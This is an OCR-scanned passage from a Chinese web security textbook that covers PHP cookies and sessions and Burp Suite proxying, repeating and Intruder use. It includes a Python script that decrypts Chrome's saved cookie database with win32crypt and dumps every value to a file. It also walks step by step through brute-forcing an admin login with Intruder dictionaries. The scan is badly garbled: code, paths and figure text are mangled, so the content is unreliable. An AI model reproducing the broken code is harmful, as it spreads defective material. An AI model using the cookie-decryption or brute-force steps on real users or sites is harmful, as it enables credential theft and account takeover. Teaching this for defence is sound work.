储 的 Cookie 文件 是 否 有 该 网 站 的 登录 信息 ,如 果 有 ,就 不 需要 再 次 验证 身份 信息 了 ,可 直 
接 访问 ,如 果 设 置 了 Cookie 过 期 时 间 ,会 在 相应 的 时 间 到 期 后 自动 删除 Cookie 文件 ,这 
时 就 需要 输入 身份 验证 信息 再 次 登录 了 。 
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14.2 Cookie 详解 


1. 设置 Cookie 
语法 : 


setcookie (name, value, expire, path, domain); 


Cookie 存储 的 信息 包含 名 称 、 值 .过 期 时 间 、 路 径 、 域 。 

路 径 和 域 构成 了 Cookie 的 作用 范围 。 

如 果 Cookie 设置 了 过 期 时 间 , 只 要 是 在 时 间 范 围 内 ,浏览 器 关闭 后 ,打开 浏览 器 时 
Cookie 还 是 有 效 的 。 但 是 不 能 有 清除 浏览 器 Cookie 的 操作 ,否则 Cookie 会 被 删除 。 

如 果 Cookie 没有 设置 过 期 时 间 , 那 么 关闭 浏览 器 时 就 会 删除 Cookie, X FÉ BJ 
Cookie 一 般 称 为 会 话 Cookie。 

例如 ,设置 user 的 Cookie, 赋 值 为 test, 过 期 时 间 为 lh。 示 例 代码 如 下 : 


«?php 
setcookie("user", "test", time()-*3600); 
PES 


首先 清空 浏览 器 缓存 ,然后 使 用 Chrome 浏览 器 访问 网 站 ,查看 其 Cookie 文件 。 
Cookie 文件 存放 在 \walk\AppData\Local\Google\Chrome\User Data\ Default\ Cookies 
(不 同 用 户 的 浏览 器 安装 路 径 不 一 样 ,Cookie 文件 路 径 也 不 同 ) 中 ,Chrome 浏览 器 的 
Cookie 文件 是 SQLite 数据 库 文件 ,用 相关 数据 库 程序 (navicat) 打 开 。Chrome 33 以 上 
版 本 对 Cookies 进行 了 加 密 , 用 SQLite Developer 打开 Chrome 的 Cookies 文件 就 会 发 
现 , 原 来 的 value 字段 已 经 为 空 ,取而代之 的 是 加 密 的 encrypted_value, 如 图 1-2 所 示 。 


host key name value path — expires utc isa is httponly — last access utc 


1926891108 — user / 13172143279885893 0 13172139679885893 


图 1-2 加密 的 encrypted_value 
运行 以 下 解密 脚本 将 Cookie 解密 : 


import sqlite3 
import win32crypt 
outFile path-r'D:WMCookies.txt'; 
sql file-r'C:NUsers walkVMAppData VLocal VGoogleVChromeVUser Data VDefault V 
Cookies'; 
Sql exe-"select host key,name,value,encrypted value from Cookies"; 
conn-sqlite3.connect(sql file) 
for row in conn.execute(sql exe): 
pwdHash-str (row[3]) 
try: 
ret-win32crypt.CryptUnprotectData (pwdHash, None, None, None, 0) 
except: 
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print 'Fail to decrypt Chrome Cookies' 
sys.exit(-1) 
with open(outFile path, 'at') as outFile: 
outFile.write('host key: (0:«20) name: (1:«20) value: (2) \r\n'.format ( 
row[0].encode ('gbk'), row[1].encode('gbk'),ret[1].encode('gbk')) ) 
conn.close() 
print 'All Chrome Cookies saved to:Wn' *toutFile path 


通过 上 述 解密 脚本 ,最终 获取 了 Cookies. txt 文件 的 内 容 ,如 图 1-3 所 示 。 


host key: 192.168.91.108 name: user value: test 


图 1-3 获取 的 Cookie 信息 


2. 获取 Cookie 
输出 user Cookie 的 值 test, 代 码 如 下 : 


«?php 
print r($ COOKIE["user"]); 
p 


利用 此 代码 就 可 以 获取 name 为 user 的 Cookie 信息 。 


3. 删除 Cookie 
可 以 利用 setcookie 函数 将 Cookie 删除 ,代码 如 下 : 


«?php 
setcookie("user", "", time ()-3600); 
E 


通过 此 代码 可 以 删除 name 为 user 的 Cookie, 
1.4.3 Session 详解 


Session 是 在 无 状态 的 HTTP 下 服务 端 跟踪 用 户 状 态 时 用 于 标识 具体 用 户 的 机 制 ， 
Session 信息 存储 在 服务 器 端的 数据 库 或 者 文件 中 。 

例如 ,在 登录 一 个 购物 网 站 后 ,选择 了 很 多 商品 加 入 到 购物 车 。 服 务 器 端 是 如 何 判断 
哪些 商品 是 哪个 用 户 选 择 的 ? 就 是 通过 Session 来 进行 判断 的 。 客 户 端 在 第 一 次 访问 服 
务 器 后 ,服务 器 会 创建 一 个 Session 信息 。 客 户 端 再 请 求 服务 器 时 都 会 带 着 这 个 Session 
信息 ,这 样 服务 器 就 能 区 分 不 同 的 客户 端 请 求 。 


1. Session 的 实现 原理 

Session 的 工作 机 制 是 : 为 每 个 访问 者 创建 一 个 唯一 的 包 , 并 基于 这 个 古来 存储 变量 。 
1) Session 的 组 成 

Session 包括 以 下 3 个 部 分 : 
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(1) Session id。 用 户 Session 的 唯一 标识 ,随机 生成 。 
(2) Session file, Session 的 存储 文件 ,文件 名 称 为 sess_Session id。 格式 如 下 : 


sess d3eom13a9r9p5i5nj923voqaf7 


(3) Session data。 保 存 序 列 化 后 的 用 户 数据 。 

2) Session 的 存储 位 置 

Session 的 存储 位 置 在 PHP 配置 文件 php. ini 中 定义 ,也 可 以 通过 应 用 程序 设置 。 
在 下 面 的 PHP 配置 文件 中 ,Session 存储 在 默认 的 /var/lib/php/session 目录 下 。 


2. PHP 中 的 Session 设置 函数 

1) Session 会 话 开启 函数 session_start 

在 存储 Session 内 容 之 前 ,必须 开启 Session 会 话 , 开启 Session 会 话 的 函数 是 
session_start, 该 函数 必须 位 于 二 html 才 标签 之 前 。 格 式 如 下 : 


此 代码 会 开启 一 个 Session 会 话 , 并 且 为 用 户 创建 一 个 唯一 的 ID ,并 基于 这 个 ID 来 
存储 变量 。 

2) Session 的 存储 与 读 取 

Session 通过 PHP 的 $_SESSION 变量 进行 Session 的 存储 与 读 取 。 
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<html> 

<body> 
«?php 

echo "sessiontest-". $ SESSION['ctfs']; 
EE 


</body> 
</html> 


以 上 代码 通过 session start 函数 开启 了 Session 会 话 , 然 后 通过 $_SESSION 变量 
存储 ctfs 的 值 ( 为 1) ,代码 运行 后 输出 sessiontest 二 1。 

通过 浏览 器 开发 者 模式 查看 Session id 为 224a4dllc2dd26b12a5cbaf9a70e3a6a, 则 
Session 在 服务 器 端 存储 的 文件 名 称 就 是 sess_224a4d11c2dd26b12a5cbaf9a70e3a6a, fE 
开发 者 模式 下 获取 的 Session id 信息 的 效果 如 图 1-4 所 示 。 

在 服务 器 中 查看 Session data 的 内 容 为 “ctfsli:1;”, 如 图 1-5 所 示 。 


sessiontest-1 


* F € > XS ipa HTML css WE DOM MS Cookies 
là | Cookies 。 XSi- EGA (8338=2 cookie) - EPERCEUETUEEEESES] 


m z m ctfs[i:l; 


图 1-4 在 开发 者 模式 下 获取 的 Session id 信息 图 1-5 服务 器 中 Session data 的 内 容 


144 Session 传输 
Session 一 般 是 在 Cookie 中 传输 的 ,但 是 有 时 候 Cookie 会 被 禁用 ,此 时 也 可 以 通过 
URL 重 写 的 方式 进行 Session 传输 。 


1. 通过 Cookie 实现 Session 传输 


Session 可 以 通过 Cookie 进行 传输 。 在 Cookie 中 传输 Session 信息 的 示例 ,如 图 1-6 
所 示 。 


sessiontest-1 


* UO€ > E pa HTML css BE DOM FE | Cookies 
l | Cookies - MSi- ”默认 (18388 —55 cookie) + 


8 PHPSESSID 22424d11c2dd26b 1225cbaf9a 70e 326a 


1-6 在 Cookie 中 传输 Session 信息 
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2. 通过 URL 重 写 实现 Session 传输 
Cookie 被 禁用 时 ,也 可 以 通过 URL 重 写 的 方式 进行 Session 传输 。 
URL 重 写 示例 如 下 : 


http://www.ctfs-wiki.com/test;sessionid-XXXXXXXXXXXXXXXXXXXXX 


3. 表单 隐藏 字段 

服务 器 会 自动 修改 表单 ,添加 一 个 隐藏 字段 ,以 便 在 表单 提交 时 能 够 把 Session id f£ 
递 回 服务 器 。 示 例如 下 : 

«form name= "test" action-"xxx"» 

«input type="hidden" name-"sessionid" 

value-"XXxxxxxxXxXXXXXXXXXXxx"» 


«input type-"text"» 
«/form» 


1.5 Burp Suite 工具 


1.5.1 Burp Suite 简介 


Burp Suite 是 一 个 用 于 测试 Web 应 用 程序 安全 性 的 图 形 工具 。 它 集成 了 多 种 渗透 
测试 组 件 ,包括 代理 . 疏 虫 ` 扫 描 ` 重 放 、 解 码 编码 等 ,是 Web 攻防 中 必 不 可 少 的 工具 之 一 。 

Burp Suite 分 为 免费 版 和 专业 版 。 专 业 版 需要 购买 , 它 比 免费 版 多 了 Scanner 组 件 
和 其 他 功能 。 


1.5.2 Burp Suite 主要 组 件 


Burp Suite 主要 包含 以 下 8 个 组 件 : 

(D Proxy。 是 一 个 进行 数据 包 拦 截 、 修 改 的 HTTP 或 者 HTTPS Web 应 用 代理 服 
务 器 ,可 以 设 在 客户 端 与 服务 器 之 间 , 对 客户 的 请 求 进行 拦截 ,分 析 并 修改 数据 包 。 

(2) Spider。 是 一 个 智能 网 络 怜 虫 , 它 能 疏 取 和 枚 举 应 用 的 目录 结构 和 功能 。 

(3) Scanner。 是 一 个 漏洞 扫描 工具 ,只 有 专业 版 可 以 使 用 该 组 件 。 使 用 它 可 以 自动 
发 现 Web 应 用 可 能 存在 的 漏洞 。 

(4) Intruder。 是 一 个 可 定制 化 的 工具 ,非常 强大 ,可 以 利用 此 工具 进行 枚 举 ,fuzz s 
洞 测试 等 。 

(5) Repeater。 是 一 个 数据 包 重 放 工 具 , 可 以 利用 它 对 某 个 截获 的 数据 包 不 断 修改 ， 
通过 重 放 此 数据 包 , 根 据 服务 器 返回 的 信息 进行 漏洞 分 析 。 

(6) Sequencer。 是 一 个 可 以 分 析 数 据 项 随机 性 质量 的 工具 ,可 以 用 它 对 Web 应 用 程 
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序 中 的 Session token 进行 分 析 。 

(7) Decoder。 是 一 个 编码 和 解码 的 工具 ,可 以 利用 它 进行 URL, Base64 等 多 种 形式 
的 编码 和 解码 。 

(8) Comparer。 是 一 个 差异 化 分 析 的 工具 ,可 以 对 两 个 不 同 的 字符 串 进行 对 比 ,分 析 
两 个 字符 串 的 差异 。 


1.5.3 Burp Suite 安装 


Burp Suite 工具 使 用 Java 编写 ,Java 自身 的 路 平台 性 使 得 Burp Suite 使 用 非常 方 
便 , 所 以 Burp Suite 的 使 用 也 必须 有 JRE 环境 。 

Burp Suite 下 载 地 址 为 https: //portswigger. net/burp/. 

JRE 下 载 地 址 为 http: //java. sun. com/j2se/downloads. html, 

JRE 下 载 和 安装 完成 后 ,直接 打开 下 载 的 Burp Suite. jar 文件 ,就 可 以 运行 Burp 
Suite 软件 了 。Burp Suite 的 界面 如 图 1-7 所 示 。 


图 1-7 Burp Suite 的 界面 


1.5.4 Burp Suite 代理 设置 


Burp Suite Proxy 组 件 是 一 个 进行 数据 包 拦截 、 修 改 的 HTTP 或 者 HTTPS Web 应 
用 代理 服务 器 ,可 以 设 在 客户 端 与 服务 器 之 间 , 对 客户 的 请 求 进行 拦截 .分 析 并 修改 在 两 
个 方向 上 的 原始 数据 流 ,是 进行 数据 分 析 与 查看 最 常用 的 组 件 。 


1. Burp Suite 设置 
Burp Suite 设置 步骤 如 下 : 
CD 打开 Burp Suite, 切 换 至 Proxy 组 件 的 页 面 ,如 图 1-8 所 示 。 


图 1-8 Burp Suite Proxy 界面 
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(2) 选择 Options 选项 卡 , 如 图 1-9 所 示 。 


(2) Proxy Listeners 


图 Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use d 


Add Running — | interface Invisible Redirect Certificate 


回  127.0.0.1:8088 
NN 
i 


Each installation of Burp generates its own CA certificate that Proxy listeners can use when negotiating SSL connections. You can| 
Import / export CA certificate Regenerate CA certificate. 


1-9 Proxy 组 件 的 Options 选项 卡 


(3) 在 Options 选项 卡 中 , 单 击 Edit 按钮 ,对 Burp Suite 进行 监听 地 址 及 端口 配置 ， 
如 图 1-10 所 示 。 


Proxy Listeners 


图 Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to 


B)  12700.18088 Per-host 


Edit proxy listener 


These settings control how Burp binds the proxy listener. 


一 一 一 
Bindto port: |8088 


Bind to address: @ Loopback only 
© All interfaces 


© Specific address: (192.168.91.1 


1-10 配置 监听 地 址 及 端口 


Bind to port 用 于 设置 监听 端口 。 本 例 设置 的 监听 端口 是 8088, 这 个 端口 设置 不 能 
与 本 地 计算 机 已 经 开启 的 端口 冲突 。 
Bind to address 用 于 设置 监听 地 址 。 监 听 地 址 有 Loopback only( 本 地 回环 )、All 
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interfaces( 所 有 地 址 )、Specific address( 指 定 具体 地 址 )3 种 ,具体 选择 哪个 监听 地 址 应 根 
据 使 用 场景 来 决定 。 

如 果 需 要 拦截 本 地 计算 机 浏览 器 的 数据 包 ,选择 Loopback only 选项 即 可 ;如 果 需 要 
拦截 其 他 计算 机 中 的 浏览 器 的 数据 包 , 需 要 选择 All interfaces 或 者 Specific address 选 
项 。 本 例 中 的 设置 是 Loopback only。 

本 地 计算 机 连接 状态 为 “TCP 127. 0. 0. 1, 8088 0. 0. 0. 0, 0 LISTENING”, ii Bj] 
Burp Suite 代理 服务 器 在 127.0.0.1 上 监听 了 8088 端口 。 

(4) 切换 至 Intercept, 设 置 数 据 包 拦截 。 

单 击 Intercept is on 按钮 启用 数据 包 拦 截 ,如 图 1-11 所 示 。 


m m — 


Host: www.ctfs-wiki.com 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*.q=0.8 

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 

Accept-Encoding: gzip, deflate 

onnection: close 

Upgrade-Insecure-Requests: 1 


图 1-11 启用 数据 包 拦 截 


单 击 Intercept is off 按钮 ,对 数据 包 只 记录 不 拦截 ,如 图 1-12 所 示 。 在 这 种 情况 下 ， 
可 以 从 HTTP history 中 查看 数据 包 , 如 图 1-13 所 示 。 


1-12 对 数据 包 只 记录 不 拦截 


2. IE 代理 设置 
IE 代理 设置 的 步骤 如 下 : 
(1) 打开 浏览 器 ,选择 “工具 ”>“Internet 选项 ”菜单 命令 ,如 图 1-14 所 示 。 
(2) 在 “Internet 选项 ”对 话 框 中 ,选择 “连接 ”选项 卡 , 单 击 “ 局 域 网 设置 ”按钮 ,如 图 1-15 
所 示 。 
(3) 在 “局 域 网 设置 ?对 话 框 中 , 色 选 “为 LAN 使 用 代理 服务 器 ” 复 选 框 ,并 输入 代理 
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Target Spider | Scanner | tracer. | Repeater | Sequencer | tecoser | comparer | Extender | Propa optons | User optons | Aerts | aypasswAr | JSD esutfer | xss\ 


[ET 


Fiter: Hiding CSS, image and gereral binary content 


Host Memos |URL Farms |Eited | Sabs |Lengn |MMEtype |Exewson | Tre 
— um T 


` 


T 
rir 
em 1HTTP/1.1 


p Www ctfs-wikicom 

ser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 
Accept: text/html,application/xhtml*xml,application/xml;q70.9,*/*:970.8 

Accept-Language: zh-CN,zh;q70.8,en-US;q70.5,en;q-0.3 

Accept-Encoding: gzip, deflate 

Connection: close 

Upgrade-Insecure-Requests: 1 


图 1-13 # HTTP history 中 查看 数据 包 


JOL Dr é || Sman x] 
xD ec sav 70 aro 

删除 浏览 历史 记录 (D).… Ctrl+Shift+ Del 

常 用 Inprivate 浏览 () Ctrl+Shift+P 

RRRRRPO 

ActiveX 自选 (X) 

SESI)... 

BARETEE/AOURTURG) 

格 站 点 添加 到 "应 用 "视图 (A) 


查看 下 载 (N) Ctrl 
弹出 窗口 阻止 程序 (P) > 
SmartScreen RART) > 
管理 媒体 许可 证 (M) 

管理 加 载 项 (A) 


蒜 容 性 视图 设置 (B) 

订阅 此 源 (P… 

EARE 

Windows 更 新 (U) 

性 能 仪表 板 Ctrl+Shift+U 
F12 开发 人 员工 具 (U 

OneNote Linked Notes 

Lync Click to Call 

Send to OneNote 


司 找 你 可 能 专 欢 的 其 他 网 站 | 添加 到 印象 笔记 5 
报告 网 站 问题 (R) 


打开 关闭 的 标签 页 ~ 
d 


图 1-14 选择 “工具 ”>“Internet 选项 ”菜单 命令 
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服务 器 的 地 址 与 端口 。 代 理 服务 器 是 Burp Suite. Hh HE ZE: 127. 0. 0. 1 ,端口 是 Burp Suite 
的 监听 端口 8088. Burp Suite 监听 设置 如 图 1-16 所 示 。 


Internet 选项 


m =e mu ^x G]es == 
Wb EAE nemer ls, meom. 


拨号 和 虚拟 专用 网 络 设置 


局 域 网 (LAN) 设 置 


LAN 设置 不 应 用 到 拨号 连接 。 对 于 拨号 设置 ， 单 击 EL 
上 面 的 "设置 按钮 。 


图 1-15 “连接 ”选项 卡 


BHEE): — |127.0.0.1 SALT: |8088] 


回 对 于 本 地 地 址 不 使 用 代理 服务 器 (B) 


[| 


图 1-16 Burp Suite 监听 设置 
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(4) 单 击 “确定 ?按钮 ,IE 代理 就 设置 完成 了 。 接 下 来 测试 代理 ,在 IE 浏览 器 中 访问 
http: //www. ctfs-wiki. com/ ,因为 设置 了 代理 的 原因 ,浏览 器 一 直 是 访问 状态 ,没有 数 
据 返 回 ,如 图 1-17 所 示 。 


OOC http://wwwatís-wikicom/_ O + > | O FESE afswikicom x | 


图 1-17 浏览 器 的 访问 状态 


Burp Suite 工具 的 Proxy 组 件 拦截 到 了 TE 浏览 器 的 请 求 数据 包 , 如 图 1-18 所 示 。 


[re [maan == | se | eae | eo | seə=ee= | see | Crmare | cove | rer seues | eae] 


Le rr narom [wensocres | ooens | 


国 Restontpywww cts-whi coma [182 6591.142] 


| ren J| oro EL asam 


cm Hex 
ET/HTTP/A.1 


Accept: text/html, application/xhtml*xml, image/jxr, */* 

lAccept-Language: zh-CN 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko 
Accept-Encoding: gzip, deflate 

Host: www.ctfs-wiki.com 


Connection: close 


图 1-18 Proxy 拦截 到 了 请 求 数 据 包 


(5) 修改 数据 包 , 如 图 1-19 所 示 , 将 Host 中 的 www. ctfs-wiki. com 改 为 www. 
baidu. com, 这 样 , 正 浏览 器 最 终 访问 的 就 是 www. baidu. com 这 个 链接 ,这 就 是 Proxy 
抓 包 和 改 包 的 过 程 。 修 改 数据 包 后 ,IE 浏览 器 返回 百度 主页 ,如 图 1-20 所 示 。 


Target Spder | Scanner | mtuder | Repeater | Sequencer | Decoder | comparer | Extender | Project optons | user optens | Awrts | Bypass war | JSON 


TTP history | websockets history | options 


国 A Request to ntpsywww badu com443 181.135.189.125] 
[orm J me | Dnm) (aen 
Params | Headers | Hex 
GET / HTTP/1.1 
Accept: text/html, application/xhtml-*xml, image/jxr, */* 
Accept-Language: zh-CN 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko 
Accept-Encoding: gzip, deflate 
Host: www.baidu.com 
Connection: close 


1-19 修改 Host 的 内 容 为 www. baidu. com 


1.5.5 Burp Suite 重 放 


Burp Suite Repeater 是 Web 安全 测试 中 多 次 重 放 同一 个 数据 包 修改 后 的 请 求 、 分 析 
响应 数据 的 组 件 。Repeater 的 界面 如 图 1-21 所 示 。 
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Bai 人 百度 


百度 一 下 


图 1-20 百度 主页 


cvm pe 
"- Ns 

w je ren [non [erc [rmm | 
ET /FV/FI.html HTTP/1.1 HTTP/1.1 200 OK À 


Host: www.ctfs-wiki.com X-Current-Location: /FI/FI.html 


User-Agent: Mozilla/5.0 (Windows NT 10.0; Accept-Ranges: bytes 

IOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Cache-Control: public, max-age=0 

cept: Last-Modified: Thu, 08 Nov 2018 02:00:01 GMT 
texhtml,application/xhtml*xml,application/xml;q ETag: W/"d4d6-166f10c3567" 
[F0.9,*/*.q70.8 Content-Type: text/html; charset-UTF-8 
JAccept-Language: Content-Length: 54486 
Izh-CN,zh;q-0.8,en-US;q-0.5,en;q-0.3 Date: Thu, 08 Nov 2018 02:02:53 GMT 

ccept-Encoding: gzip, deflate Connection: close 


'eferer: http://www.ctfs-wiki.com/Fl/ I 
-Moz: prefetch 
(Connection: close *IDOCTYPE HTML» 


数据 包 请 求 区 eec FOREN 


<meta charset-"UTF-8"» 


图 1-21 Repeater 的 界面 


又 


Target 是 数据 请 求 域 ,表示 数据 包 发 送 的 目标 服务 器 的 地 址 。 如 果 修改 了 Host 的 
值 , 而 没有 修改 Target 值 ,数据 包 还 是 会 发 送 给 Target 定义 的 地 址 。 

Go 按钮 用 于 发 送 一 次 请 求 。Burp Suite 重 放 就 是 修改 数据 包 后 单 击 Go 按钮 发 送 请 
求 , 然 后 对 数据 包 响应 区 的 数据 进行 分 析 , 反 复 修改 数据 包 , 再 发 送 请 求 并 对 响应 进行 分 
析 的 过 程 。 


1.5.6 Burp Suite 爆破 


Burp Suite Intruder 是 一 个 功能 强大 的 自动 化 测试 模块 ,常用 来 进行 暴力 破解 、 模 糊 
测试 等 。 

Intruder 的 界面 主要 包含 4 部 分 。Target 是 数据 请 求 域 ,定义 了 请 求 的 目标 服务 器 
的 地 址 ;Positions 设置 模糊 测试 位 置 和 测试 的 模式 ; Payloads 设置 测试 的 payload 字典 ; 
Options 设置 线程 .正则 匹配 等 。Intruder 的 界面 如 图 1-22 所 示 。 

本 节 介 绍 利 用 Burp Suite Intruder 爆破 弱 口 令 的 方法 。 

如 果 网 站 存在 管理 后 台 , 但 是 没有 验证 码 等 防爆 破 机 制 , 就 可 以 利用 Burp Suite 
Intruder 模块 对 网 站 的 管理 后 台 进 行 爆破 。 网 站 后 台 管 理 系 统 的 页 面 如 图 1-23 所 示 , 
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[Burp intruder Repeater Window Help 


Repeater | Sequencer 


(2) Payload Positions 


Configure the positions where payloads will be inserted into the bas 
details 


Attack type: | Sniper 


POST /example?p!-8plval8&p2- 8p2val$ HTTP/1.O 


图 1-22 Intruder 的 界面 


€ Os wwwctfs-wiki.com/admin/iogin php "c $ e ax "me mx 
|, @ dockerta2 


图 1-23 网 站 后 台 管理 系统 页 面 


利用 Burp Suite Intruder 模块 对 网 站 的 管理 后 台 进 行 爆破 的 步骤 如 下 : 

CD 打开 Burp Suite 抓 包工 具 , 然 后 在 浏览 器 中 设置 代理 ,输入 任意 用 户 名 、 密 码 , 单 
击 后 台 管 理 系 统 “ 登 录 ” 按 钮 ,Burp Suite 拦截 到 登录 验证 的 数据 请 求 包 。 

Burp Suite 对 用 户 名 和 密码 抓 包 的 效果 如 图 1-24 所 示 。 

(2) 右 击 抓 到 的 数据 包 ,在 快捷 菜单 中 选择 Send to Intruder 命令 菜单 ,将 此 数据 包 
发 送 给 Intruder 组 件 , 如 图 1-25 所 示 。 

(3) Æ Intruder 中 ,切换 至 Positions 选项 卡 , 设 置 模糊 测试 位 置 和 测试 模式 。 此 处 
需要 进行 爆破 的 是 用 户 名 、 密 码 , 所 以 要 选择 用 户 名 、 密 码 两 个 位 置 , Intruder 默认 会 识别 
并 选择 几 个 模糊 测试 位 置 ,一 般 不 准确 。Intruder 识别 的 模糊 测试 位 置 如 图 1-26 所 示 。 

单 击 Clear 按钮 ,清空 Intruder 识别 的 模糊 测试 位 置 , 如 图 1-27 所 示 。 

(4) 设置 模糊 测试 位 置 。 选 中 admin 和 11111, 单 击 Add 按钮 ,这 样 就 选 好 了 用 户 名 
和 密码 的 模糊 测试 位 置 , 如 图 1-28 所 示 。 

(5) 选择 测试 模式 。 在 Attack type 下拉 列 表 框 中 选择 Cluster bomb, 如 图 1-29 所 
示 。 在 这 个 模式 下 ,用户 名 、 密 码 的 payload 会 进行 交叉 测试 。 例 如 ,用 户 名 的 字典 设置 
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POST /admin/login.action.php HTTP/1.1 
ost: www.ctfs-wiki.com 

ser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Geck 
Accept: text/html,application/xhtml*xml,application/xml;q-0.9,*/*:q 
Accept-Language: zh-CN,zh;qz0.8,en-US;q70.5,en;q-0.3 
Accept-Encoding: gzip, deflate 

Referer: http://www.ctfs-wiki.com/admin/login.php 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 51 

Connection: close 

Upgrade-Insecure-Requests: 1 


username=admin&image.x=29&image.y=21&password=11111 


图 1-24 Burp Suite 对 用 户 名 和 密码 抓 包 


Foward Dop | [mereeptison | J 

— 

[GET / HTTP/1.1 

[ost e Send to Spider 

Connection: close 

ICache-Control: max-age=0 Do an active scan 

upgrade-Insecure-Requests: 1 Send to Intruder [o 
lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple] Send to Repeater Ctrl+R 
eon html， li xhtml J jli n/xml; q-0.9. und to Sequnce, 

ccept: text/html application/xhtml*xml,application/xml; x 
|Accept-Encoding: gzip, deflate m cos 
nccept-Language: zh-CN.zh;q-0 3 en:q=0.8 Send to Decoder 


r 


amas ee 


1-25 将 数据 包 发 送 给 Intruder 


Host: www ctfs wikicom 


POST /admin/login.action.php HTTP/1.1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv.55.0) Gecko/20100101 Firefox/55.0 


Accept text/html, application/xhtmH«xml application/xml; 70.9, "/*.q-0.8 
Accept-Language: zh-CN,zh;q"0.8,en-US;q-0.5,en;q-0.3 


Accept-Encoding: gzip, deflate 


Referer: http://www.ctfs-wiki.com/admin/login. php 
Content-Type: application&-www-form-urlencoded 


Content-Length: 51 
Connection: close. 
Upgrade-Insecure-Requests: 1 


usemame=§admin§&image x-82988image.y- 82188 password-8111118 


1-26 Intruder 识别 的 模糊 测试 位 置 
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为 admin ,root ,密码 的 字典 设置 为 admin、123456 ,最 终 测 试 的 是 admin: admin, admin: 
123456,root; admin,root; 123456 这 4 个 组 合 。 


ET 
一 一 一 一 一 -一 
POST /admin/login.action.php HTTP/1.1 
Host www ctfs-wiki com ES 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv.55.0) Gecko/20100101 Firefox/55.0 [mm] 
Accept: text/html, application/xhtmtxml,application/xml;q0.9,*/*;q-0.8 Em) 
lAccept-Language: zh-CN,zh;q-0.8,en-US;q-0.5,en;q-0.3 
;ept-Encoding: gzip, deflate 
Referer: http./!Www.ctfs-wikl.com/admin/Iogin. php 
Content-Type: application^i-www-form-urlencoded. 
|Content-Length: 51 
Connection: close 
Upgrade-Insecure-Requests: 1 


usernamezadmin&image.x-298 image. y-218passwordz 1111 


图 1-27 清空 Intruder 识别 的 模糊 测试 位 置 


—rI E 


POST /admin/login.action.php HTTP/1.1 em | 


== 
Host: www.ctfs-wiki.com — J 
User-Agent Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 [一 一 | 
Accept: text/html, application/xhtml*xml,application/xml;q20.9,*/*;q20.8 =] 


Accept-Language: zh-CN, zh;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 

Referer: http://www.ctfs-wiki.com/admin/login.php 
Content-Type: application/x-www-form-urlencoded 
(Content-Length: 51 

(Connection: close 

Upgrade-Insecure-Requests: 1 


usemame Bri meoe e208 mage y=218paoonore- 


图 1-28 设置 模糊 测试 位 置 


图 Payload Positions [startattack | 
Configure the positions where payloads will be inserted into the base request The attack type 
determines the way in which payloads are assigned to payload positions - see help for full details. 


—E=— 


POST /admin/login.action.php HTTP/1.1 (as j 


Host: www.ctfs-wiki.com (omms | 
User-Agent: Mozilla/5.0 (Windows NT (omes J 
10.0; WOW64; rv:55.0) Gecko/20100101 (omm | 
Firefox/55.0 

Accept: 


1-29 选择 Cluster bomb 模式 


(6) 设置 用 户 名 、 密 码 的 字典 。 因 为 要 设置 两 个 字典 ,所 以 Payload set 会 有 1 和 :2 两 
个 选项 ,分 别 对 应 模糊 测试 选择 的 两 个 位 置 。 本 例 中 username 在 前 ,password 在 后 , 因 
此 1 的 payload 就 是 username 的 payload 字典 ,2 的 payload 就 是 password 的 payload 字 
典 。Payload set 下 拉 列 表 框 如 图 1-30 所 示 。 
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(g) Payload Sets 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in. 
payload type can be customized in different ways. 


(@ Payload Options [Simple lisi 
This payload type lets you configure a simple list of strings that are used as payloads. 


图 1-30 Payload set 下 拉 列 表 框 


(7) 选择 用 户 名 字典 ,在 Payload set 下 拉 列 表 框 中 选择 1, 在 Payload Options 选项 


图 Payload Sets 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in 
payload type can be customized in different ways. 


= 
pn sem — ËB] ss 


(8) Payload Options [Simple lis 
This payload type lets you configure a simple ist of strings that are used as payloads. 


1-31 用 户 名 字典 的 设置 


mem Web 安全 原理 分 析 与 实践 ”sg 


(8) 选择 密码 字典 。 在 Payload set 下 拉 列 表 框 中 选择 2, 在 Payload Options 选项 组 
中 单 击 Load 按钮 , 载 人 字典 文件 。 密 码 字 典 的 设置 如 图 1-32 所 示 。 


Payload Sets 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in thd 
payload type can be customized in different ways. 


m Em m 
Payload type: | Simple list. = Request count: 39,215,060 


Payload Options [Simple list] 
This payload type lets you configure a simple list of strings that are used as payloads. 


132 ”密码 字典 的 设置 


(9) 字典 设置 完成 后 , 单 击 Start attack 按钮 开始 爆破 ,如 图 1-33 所 示 。 


图 Payload Sets 
You can define one or more payload sets. The number of payload sets depends 
on the attack type defined in the Positions tab. Various payload types are 


available for each payload set, and each payload type can be customized in 
different ways. 


Payoad set |2 [7] Payload count: 77,195 
Payload type: | Simple list. [7] Request count: 39,215,060 


() Payload Options [Simple list] 


This payload type lets you configure a simple ist of strings that are used as payloads. 


一 一 全 H 
(nemo) == 2 
passwo D 


p d 


133 ”开始 爆破 
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(10) 运行 完成 后 ,因为 进行 了 大 量 的 爆破 ,所 以 数据 包 的 数量 很 大 。 如 何 快速 判断 
哪个 数据 包 是 登录 成 功 的 数据 包 ? 一 般 情况 下 要 根据 返回 数据 包 的 状态 码 和 返回 长 度 来 
判断 ,登录 成 功 的 数据 包 和 登录 失败 的 数据 包 会 有 两 个 截然 不 同 的 返回 数据 包 。 如 果 选 
